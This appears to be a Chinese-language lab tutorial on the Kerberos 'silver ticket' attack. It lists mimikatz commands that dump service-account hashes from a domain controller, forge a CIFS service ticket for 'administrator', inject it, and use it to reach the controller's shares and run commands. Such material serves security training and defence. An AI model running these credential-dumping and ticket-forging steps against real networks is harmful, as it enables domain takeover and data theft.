實驗工具:
實驗環境:網域名稱稱
域的sid值
域的服務賬號的密碼hash
偽造的使用者名稱,可以是任意使用者名稱,一般是偽造administrator
需要訪問的服務
一、獲取service賬戶的hash值
在域控制器上操作:
通過 mimikatz 輸入命令來獲取network server下服務賬戶雜湊值:sekurlsa::logonpasswords
也可以通過wce、gethashes等方式獲取。
若出現錯誤,執行此命令後再獲取 hash值:privilege::debug
二、偽造票據
在 ******域下的裝置(windows 7)上操作:
得到服務賬號的 hash 之後使用mimikatz中的 kerberos::golden功能生成**票據tgs ticket。
引數說明:
/domain:當前網域名稱稱
/sid:sid 值,域的sid
/target:目標主機
/rc4:目標主機的 hash值
/server:需要獲取許可權的服務
/user:偽造的使用者名稱
/ptt:表示的是pass the ticket 攻擊,是把生成的票據匯入記憶體,也可以使用 /ticket 匯出之後再使用 kerberos::ptt 匯入。
常見的service:
這裡的service使用的是 cifs 服務:
kerberos::golden /domain:test.com /sid:s-1-5-21-593020204-2933201490-533286667 /target:計算機名稱.test.com /rc4:68d728ba8b578294832fb6247c912f94 /service:cifs /user:administrator /ptt
3. 獲取許可權
在 ******域下的裝置(windows 7)上操作:
清空本地票據快取,匯入偽造的票據(如果用的/ptt引數就跳過這一步,只需要清理本地快取)
檢視本地儲存的票據:kerberos::list
清理本地票據快取:kerberos::purge
匯入偽造的**票據:kerberos::ptt silver.kiribi
(步驟2使用了 /ptt ,所以此步忽略)
檢視tgt票據(只能看到存在的**票據):kerberos::tgt
票據20分鐘內有效,過期之後可以再次匯入
4. 利用偽造的**票據
在 ******域下的裝置(windows 7)上操作:
訪問域控的共享目錄
遠端登入,執行命令
域滲透 白銀票據利用
0x01 介紹 0x02 票據利用 之前,我們已經詳細說過kerberos認證的流程,這次我們就來說說如何對其進行利用,這次主要說的是 票據偽造 silver tickets 票據偽造利用的是kerberos認證中的第三個步驟,在第三步的時候,client會帶著ticket向server的某個服務進...